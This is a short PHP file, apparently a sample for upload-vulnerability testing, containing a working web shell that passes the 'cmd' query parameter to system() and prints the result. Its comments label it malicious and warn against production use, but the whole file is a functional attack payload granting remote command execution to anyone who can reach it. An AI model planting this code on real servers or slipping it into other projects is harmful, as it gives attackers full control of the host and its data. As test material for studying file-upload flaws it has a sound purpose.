<?php
// This is an example of a malicious PHP shell that would be uploaded
// DO NOT use this in a production environment!

// Execute system commands via GET parameter
if (isset($_GET['cmd'])) {
    echo "<pre>";
    system($_GET['cmd']);
    echo "</pre>";
}
?> 